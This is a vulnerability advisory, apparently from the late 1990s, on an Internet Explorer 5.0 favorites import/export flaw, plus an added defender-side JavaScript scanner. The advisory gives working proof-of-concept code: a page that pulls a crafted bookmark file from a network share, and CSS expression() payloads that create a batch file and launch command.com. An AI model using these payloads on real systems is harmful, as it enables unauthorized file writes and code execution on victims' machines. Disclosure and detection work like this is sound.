Description:
Internet Explorer 5.0 under Windows 95/NT 4.0 (Windows 98 is presumably vulnerable
as well) allows a web page to create and overwrite local files using the
window.external.ImportExportFavorites() method. In SOME cases it is also possible
to put attacker-chosen content in the created file, which means arbitrary
programs may be executed.
Details:
The problem is the window.external.ImportExportFavorites() method, which is
used to import and export bookmarks from and to Netscape Communicator.
The bigger problem is that it allows creating and overwriting files, which
obviously leads to a dangerous DoS attack: one may overwrite critical files,
which may lead to reinstalling Windows.
Example of this is:
<SCRIPT>
window.external.ImportExportFavorites(0,"c:\\fav.hta");
</SCRIPT>
which will create a file c:\fav.hta containing IE's favorites without asking
the user, just notifying him that the operation was successful.
In SOME cases, HTML code may be injected in the exported file by importing a
specially designed HTML file. The file to be imported may reside on a Samba or
Windows file server and may be accessed over Microsoft Networking.
The difficult part is that the injected content must survive the export using
only the <A> tag, but HTML Applications help again.
I have verified importing on a Windows NT 4.0 box directly connected to the
Internet and it worked fine.
But I could not reproduce importing favorites with Windows 95 connected to the
Internet via dial-up; I do not have enough network resources to investigate
further.
I SHALL MUCH APPRECIATE IT IF SOME NETWORK GURU EXPLAINS TO ME WHY IMPORTING USING
MICROSOFT NETWORKING DOES NOT WORK IN SOME CASES
AND CONFIRMS OR DENIES THE POSSIBILITY OF IMPORTING FAVORITES FROM A NETWORK
FILE SERVER.
It is possible to import the file using the "http" protocol, but then the user
must click the default button "YES"; Microsoft does not warn about any security
problems in this case.
So the code looks like this:
In an HTML file:
------------------------------------------------------------------
<SCRIPT>
// you must change the IP or make the file local !!!!!!!!!!
window.external.ImportExportFavorites(1,"\\\\1.1.1.1\\test\\fav.imp");
// Sure, the StartUp folder is better
window.external.ImportExportFavorites(0,"c:\\fav.hta");
</SCRIPT>
------------------------------------------------------------------
In the imported file (fav.imp), residing on a samba or Windows server
without authentication:
-------------------------------------------------------------------
<!DOCTYPE NETSCAPE-Bookmark-file-1>
<DL>
<DT><A HREF="#" STYLE="left:expression(eval('f= new ActiveXObject(\'Scripting.FileSystemObject\');a=f.CreateTextFile(\'C:\\\\GTEST.BAT\',true);a.WriteLine(\'echo Hi\');a.WriteLine(\'pause\');a.close();alert(\'File C:\\\\GTEST.BAT created\');window.close();'));" ADD_DATE="923225094" LAST_VISIT="934146000" LAST_MODIFIED="923225096">123456</A>
<DT><A HREF="#" STYLE="left:expression(eval('a=new ActiveXObject(\'WScript.Shell\');a.run(\'c:\\command.com\');alert(\'Program started\');window.close()'));" ADD_DATE="923225094" LAST_VISIT="934146000" LAST_MODIFIED="923225096">123455</A>
</DL>
-------------------------------------------------------------------
To see the effect, start c:\fav.hta (it may be placed in the StartUp folder and
executed automatically).
This vulnerability can be exploited via an email or Usenet message using window.open().
The user must have file sharing installed in order for remote importing to work.
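For the defender's side of the two files above, here is an added example (my own code, not part of the original advisory) that scans an HTML page or a Netscape-style bookmark file for the constructs this technique depends on: a scripted call to window.external.ImportExportFavorites(), a CSS expression() inside a STYLE attribute, ActiveXObject instantiation, and a UNC import source on a network share. The pattern names, the constructed sample inputs and the shouldBlock() policy are assumptions of mine; the sample bookmark file uses a harmless alert() in place of any file-writing payload.

```javascript
// Added example, not part of the original advisory: a defender-side scanner
// for the constructs this advisory relies on, suitable for a mail gateway,
// a web proxy, or a check run over a favorites export before it is imported.
// Pattern names, sample inputs and the shouldBlock() policy are assumptions.

const PATTERNS = [
  {
    id: 'import-export-favorites',
    re: /window\.external\.ImportExportFavorites\s*\(/gi,
    why: 'script drives the favorites import/export without a real user action',
  },
  {
    id: 'css-expression',
    re: /style\s*=\s*["'][^"']*expression\s*\(/gi,
    why: 'CSS expression() runs script when the element is styled',
  },
  {
    id: 'activex-object',
    re: /new\s+ActiveXObject\s*\(/gi,
    why: 'ActiveXObject hands script the file system or shell',
  },
  {
    id: 'unc-path',
    re: /\\{2,4}[\w.-]+\\{1,2}[\w.-]+/g, // \\server\share, raw or JS-escaped
    why: 'import source is fetched from a network share',
  },
];

// Scan HTML / bookmark text and return one finding per match:
// { id, line, snippet, why }, ordered by line number, then pattern id.
function scanHtml(text) {
  const findings = [];
  for (const p of PATTERNS) {
    for (const m of text.matchAll(p.re)) {
      const line = text.slice(0, m.index).split('\n').length;
      const snippet = text.slice(m.index, m.index + 60).split('\n')[0];
      findings.push({ id: p.id, line, snippet, why: p.why });
    }
  }
  return findings.sort((a, b) => a.line - b.line || a.id.localeCompare(b.id));
}

// Policy: any hit is enough to quarantine the file. A loader page and an
// import file trip different pattern sets, so both get caught.
function shouldBlock(text) {
  return scanHtml(text).length > 0;
}

// Constructed sample inputs, shaped like the advisory's two files but with
// a harmless alert() in place of any file-writing payload.
const SAMPLE_LOADER_PAGE = String.raw`<HTML><BODY>
<SCRIPT>
window.external.ImportExportFavorites(1,"\\\\fileserver\\share\\fav.imp");
window.external.ImportExportFavorites(0,"c:\\fav.hta");
</SCRIPT>
</BODY></HTML>`;

const SAMPLE_BOOKMARKS = String.raw`<!DOCTYPE NETSCAPE-Bookmark-file-1>
<DL>
<DT><A HREF="http://www.example.com/" ADD_DATE="923225094">Example</A>
<DT><A HREF="#" STYLE="left:expression(alert('style ran'))" ADD_DATE="923225094">123456</A>
<DT><A HREF="#" STYLE="left:expression(eval('a=new ActiveXObject(\'WScript.Shell\')'))">123455</A>
</DL>`;

const CLEAN_BOOKMARKS = String.raw`<!DOCTYPE NETSCAPE-Bookmark-file-1>
<DL>
<DT><A HREF="http://www.example.com/" ADD_DATE="923225094">Example</A>
</DL>`;

if (typeof require !== 'undefined' && require.main === module) {
  const samples = [
    ['loader page', SAMPLE_LOADER_PAGE],
    ['bookmarks', SAMPLE_BOOKMARKS],
    ['clean', CLEAN_BOOKMARKS],
  ];
  for (const [name, text] of samples) {
    console.log(`${name}: block=${shouldBlock(text)}`);
    for (const f of scanHtml(text)) {
      console.log(`  line ${f.line} [${f.id}] ${f.snippet}  (${f.why})`);
    }
  }
}
```

Run with node; the loader page is flagged on the ImportExportFavorites calls and the UNC source, the bookmark file on the STYLE expressions and the ActiveXObject, and the clean bookmark file passes. The regexes are deliberately loose (case-insensitive, whitespace-tolerant) because the bookmark format is line-oriented and the attacker controls the spacing; the cost of a false positive on a legitimate favorites export is a review, not a compromise.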
Workaround:
Disable Active Scripting
Demonstration.
Warning: this demonstration creates the file "fav.hta" in C:\. To
get rid of it, delete this file.
1) Create the file C:\FAV.HTA
2) Offline demonstration of putting files in the StartUp folder (annoying)
3) Online demonstration of putting files in the StartUp folder (annoying, may not work)
4) Demonstration using the http protocol (asks the user)